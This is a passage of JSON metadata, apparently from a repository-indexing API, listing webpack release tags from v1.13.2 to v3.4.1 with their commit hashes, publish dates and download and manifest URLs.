0","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/w